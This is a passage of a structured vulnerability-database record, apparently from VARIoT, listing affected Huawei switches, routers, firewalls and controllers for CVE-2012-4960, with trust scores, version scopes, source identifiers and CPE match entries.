            model: "s7700",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r006",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r001",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r002",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r003",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r006",
         },
         {
            model: "svn2000",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r001c00",
         },
         {
            model: "svn3000",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r002c02spc802b041",
         },
         {
            model: "svn5000",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r001c00",
         },
         {
            model: "svn5300",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v100r001c01b019",
         },
         {
            model: "wlan ac 6605",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r001c00",
         },
         {
            model: "wlan ac 6605",
            scope: "eq",
            trust: 1.8,
            vendor: "huawei",
            version: "v200r001c00spc100",
         },
         {
            model: "cx600",
            scope: null,
            trust: 1.2,
            vendor: "huawei",
            version: null,
         },
         {
            model: "eudemon 8160e",
            scope: "lte",
            trust: 1,
            vendor: "huawei",
            version: "v100r003c00",
         },
         {
            model: "eudemon usg5500",
            scope: "lte",
            trust: 1,
            vendor: "huawei",
            version: "v200r002",
         },
         {
            model: "e200x3",
            scope: "lte",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            "model": "h3c ar\\",
            scope: "lte",
            trust: 1,
            vendor: "huawei",
            version: "r2209",
         },
         {
            model: "ar 19\\/29\\/49",
            scope: "lte",
            trust: 1,
            vendor: "huawei",
            version: "r2207",
         },
         {
            model: "e200x7",
            scope: "lte",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "e200 usg2200",
            scope: "lte",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "eudemon usg9500",
            scope: "lte",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00spc600",
         },
         {
            model: "e200 usg5100",
            scope: "lte",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "eudemon usg5300",
            scope: "lte",
            trust: 1,
            vendor: "huawei",
            version: "v200r001",
         },
         {
            model: "ne40e\\/80e",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v600r002",
         },
         {
            model: "eudemon 8080e",
            scope: "lte",
            trust: 1,
            vendor: "huawei",
            version: "v100r003c00",
         },
         {
            model: "e200e-usg2100",
            scope: "lte",
            trust: 1,
            vendor: "huawei",
            version: "v100r005c01",
         },
         {
            model: "ne40e\\/80e",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v600r003",
         },
         {
            model: "e200x5",
            scope: "lte",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "ne40e",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v300r005",
         },
         {
            model: "ne20e-x6",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v300r005",
         },
         {
            model: "eudemon usg9300",
            scope: "lte",
            trust: 1,
            vendor: "huawei",
            version: "v100r003c00",
         },
         {
            model: null,
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar 19/29/49",
            scope: "lte",
            trust: 0.8,
            vendor: "huawei",
            version: "r2207",
         },
         {
            model: "e200e-x3",
            scope: "lte",
            trust: 0.8,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "e200e-x5",
            scope: "lte",
            trust: 0.8,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "e200e-x7",
            scope: "lte",
            trust: 0.8,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "e200e/usg2100",
            scope: "lte",
            trust: 0.8,
            vendor: "huawei",
            version: "v100r005c01",
         },
         {
            model: "e200e/usg2200",
            scope: "lte",
            trust: 0.8,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "e200e/usg5100",
            scope: "lte",
            trust: 0.8,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "eudemon8080e",
            scope: "lte",
            trust: 0.8,
            vendor: "huawei",
            version: "v100r003c00",
         },
         {
            model: "eudemon8160e",
            scope: "lte",
            trust: 0.8,
            vendor: "huawei",
            version: "v100r003c00",
         },
         {
            model: "eudemonusg5300",
            scope: "lte",
            trust: 0.8,
            vendor: "huawei",
            version: "v200r001",
         },
         {
            model: "eudemonusg5500",
            scope: "lte",
            trust: 0.8,
            vendor: "huawei",
            version: "v200r002",
         },
         {
            model: "eudemonusg9300",
            scope: "lte",
            trust: 0.8,
            vendor: "huawei",
            version: "v100r003c00",
         },
         {
            model: "eudemonusg9500",
            scope: "lte",
            trust: 0.8,
            vendor: "huawei",
            version: "v200r001c00spc600",
         },
         {
            model: "h3c ar",
            scope: "lte",
            trust: 0.8,
            vendor: "huawei",
            version: "ar x9 series r2209",
         },
         {
            model: "ne20e-x6",
            scope: "eq",
            trust: 0.8,
            vendor: "huawei",
            version: "v600r003",
         },
         {
            model: "ne40e",
            scope: "eq",
            trust: 0.8,
            vendor: "huawei",
            version: "v300r003",
         },
         {
            model: "ne40e",
            scope: "eq",
            trust: 0.8,
            vendor: "huawei",
            version: "v600r002",
         },
         {
            model: "ne40e",
            scope: "eq",
            trust: 0.8,
            vendor: "huawei",
            version: "v600r003",
         },
         {
            model: "ne40e/80e",
            scope: "eq",
            trust: 0.8,
            vendor: "huawei",
            version: "v300r003",
         },
         {
            model: "ne40e/80e",
            scope: "eq",
            trust: 0.8,
            vendor: "huawei",
            version: "v600r001",
         },
         {
            model: "ne40e/80e",
            scope: "eq",
            trust: 0.8,
            vendor: "huawei",
            version: "v600r002",
         },
         {
            model: "ne40e/80e",
            scope: "eq",
            trust: 0.8,
            vendor: "huawei",
            version: "v600r003",
         },
         {
            model: "ne80e",
            scope: "eq",
            trust: 0.8,
            vendor: "huawei",
            version: "v300r003",
         },
         {
            model: "s2700",
            scope: "eq",
            trust: 0.8,
            vendor: "huawei",
            version: "v100r005",
         },
         {
            model: "ne5000e v300r007",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ne5000e v800r002",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ma5200g v200r003",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ma5200g v300r003",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ne40e/80e",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "atn v200r001c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "atn v200r001c01",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ne40/ne80 v300r005",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ne20e-x6 v600r003",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ne20 v200r005",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "me60",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "cx200/cx300 v100r005",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "acu v100r003c01spc100",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "acu v200r001c00spc100",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "acu v200r001c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "wlan ac v200r001c00",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "6605",
         },
         {
            model: "wlan ac v200r001c00spc100",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "6605",
         },
         {
            model: "s9300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s7700",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2300/s3300/s5300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2300/s3300/s5300/s2700/s3 v100r005",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2300/s3300/s5300/s3300hi/ v100r006",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s3300hi/s5300hi/s5306/s630 v200r001",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar g3 v200r001c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar g3 v200r001c01",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar g3 v200r002c00spc200",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "h3c ar ar series r2209",
            scope: "lte",
            trust: 0.6,
            vendor: "huawei",
            version: "<=x9",
         },
         {
            model: "ar r2207",
            scope: "eq",
            trust: 0.6,
            vendor: "huawei",
            version: "19/29/49<=",
         },
         {
            model: "eudemon100e v200r007",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "eudemon200 v200r001",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "eudemon300&500&1000 v200r006c02",
            scope: "lte",
            trust: 0.6,
            vendor: "huawei",
            version: "<=",
         },
         {
            model: "eudemon1000e-u/usg5300 v200r001",
            scope: "lte",
            trust: 0.6,
            vendor: "huawei",
            version: "<=",
         },
         {
            model: "eudemon1000e-x/usg5500 v200r002",
            scope: "lte",
            trust: 0.6,
            vendor: "huawei",
            version: "<=",
         },
         {
            model: "eudemon8080e&8160e/usg9300 v100r003c00",
            scope: "lte",
            trust: 0.6,
            vendor: "huawei",
            version: "<=",
         },
         {
            model: "eudemon8000e-x/usg9500 v200r001c00spc600",
            scope: "lte",
            trust: 0.6,
            vendor: "huawei",
            version: "<=",
         },
         {
            model: "e200e-c&x3&x5&x7/usg2200&5100 v200r003c00",
            scope: "lte",
            trust: 0.6,
            vendor: "huawei",
            version: "<=",
         },
         {
            model: "e200e-b&x1&x2/usg2100 v100r005c01",
            scope: "lte",
            trust: 0.6,
            vendor: "huawei",
            version: "<=",
         },
         {
            model: "svn5300 v100r001c01b019",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "svn2000&5000 series v200r001c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "svn3000 v100r002c02spc802b041",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "nip100/200/1000 v100r001",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "nip2100&2200&5100 v100r001c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "quidway series",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "quidway series",
            scope: "eq",
            trust: 0.3,
            vendor: "huawei",
            version: "0",
         },
         {
            model: "me60 v600r002c07",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "cx600 v600r003c00spc900",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "cx600 v600r001",
            scope: null,
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar r2207",
            scope: "eq",
            trust: 0.3,
            vendor: "huawei",
            version: "19/29/49",
         },
         {
            model: "me60 v600r005c00spc900",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "cx600 v600r005c00spc900",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "cx600 v600r003c00spca00",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: null,
         },
         {
            model: "ar r2209",
            scope: "ne",
            trust: 0.3,
            vendor: "huawei",
            version: "19/29/49",
         },
      ],
      sources: [
         {
            db: "CERT/CC",
            id: "VU#948096",
         },
         {
            db: "CNVD",
            id: "CNVD-2013-08074",
         },
         {
            db: "CNVD",
            id: "CNVD-2012-6517",
         },
         {
            db: "BID",
            id: "56510",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-006004",
         },
         {
            db: "NVD",
            id: "CVE-2012-4960",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [],
                  cpe_match: [
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:ma5200g:v300r003:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:ma5200g:v200r003:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:ne40e:v300r005:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:atn:v200r001c00:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:atn:v200r001c01:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:me60:v600r002:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:me60:v600r003:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:cx300:v100r005:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:acu:v100r003c01spc100:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:acu:v200r001c00spc100:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:s9300:v100r006:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:s7700:v100r003:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:s5300:v100r003:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:s2300:v100r005:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:s3300hi:v100r006:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:s5300hi:v100r006:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:s3300hi:v200r001:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:s5300hi:v200r001:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:ar_g3:v200r001c01:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:ar_g3:v200r002c00spc200:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:eudemon_usg5500:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        versionEndIncluding: "v200r002",
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:eudemon_8160e:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        versionEndIncluding: "v100r003c00",
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:e200x5:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        versionEndIncluding: "v200r003c00",
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:e200x7:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        versionEndIncluding: "v200r003c00",
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:h3c_ar\\(oem_in\\):*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        versionEndIncluding: "r2209",
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:eudemon500:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        versionEndIncluding: "v200r006c02",
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:svn3000:v100r002c02spc802b041:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:svn5000:v200r001c00:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:ne40e:v600r001:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:ne80e:v600r001:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:ne40:v300r005:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:ne80:v300r005:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:me60:v600r005c00spc600:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:cx600:v200r002:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:acu:v200r001c00:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:wlan_ac_6605:v200r001c00:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:s7700:v100r006:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:s2300:v100r002:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:s3300:v100r005:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:s5300:v100r005:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:s5306:v100r006:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:s6300:v100r006:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:s5306:v200r001:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:s6300:v200r001:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:ar_19\\/29\\/49:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        versionEndIncluding: "r2207",
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:eudemon100e:v200r007:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:eudemon_8080e:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        versionEndIncluding: "v100r003c00",
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:eudemon_usg9300:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        versionEndIncluding: "v100r003c00",
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:e200_usg2200:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        versionEndIncluding: "v200r003c00",
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:e200_usg5100:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        versionEndIncluding: "v200r003c00",
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:eudemon1000:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        versionEndIncluding: "v200r006c02",
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:nip5100:v100r001c00:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:nip2200:v100r001c00:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:svn2000:v200r001c00:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:svn5300:v100r001c01b019:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:ne40e\\/80e:v600r002:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:ne80e:v600r002:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:ne20e-x6:v300r005:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:ne20:v200r005:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:cx600:v600r001:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:cx600:v600r002:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:wlan_ac_6605:v200r001c00spc100:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:s9300:v100r001:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:s2300:v100r003:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:s3300:v100r002:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:s3700:v100r005:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:s5700:v100r005:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:s2700:v100r006:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:s3700:v100r006:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:s3700:v200r001:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:s5700:v200r001:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:eudemon200:v200r001:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:eudemon300:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        versionEndIncluding: "v200r006c02",
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:eudemon1000e-u:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        versionEndIncluding: "v200r001",
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:eudemon8000e-x:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        versionEndIncluding: "v200r001c00spc600",
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:eudemon_usg9500:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        versionEndIncluding: "v200r001c00spc600",
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:e200e-b:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        versionEndIncluding: "v100r005c01",
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:e200e-x1:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        versionEndIncluding: "v100r005c01",
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:nip2100:v100r001c00:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:nip1000:v100r001:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:ne5000e:v300r007:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:ne5000e:v800r002:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:ne40e\\/80e:v600r003:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:ne80e:v600r003:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:me60:v100r005:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:me60:v100r006:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:cx600:v600r003:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:cx200:v100r005:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:s9300:v100r002:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:s9300:v100r003:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:s3300:v100r003:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:s5300:v100r002:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:s2300:v100r006:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:s3300:v100r006:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:s5300:v100r006:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:s5700:v100r006:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:s6700:v100r006:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:s6700:v200r001:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:ar_g3:v200r001c00:*:*:*:*:*:*:*",
                        cpe_name: [],
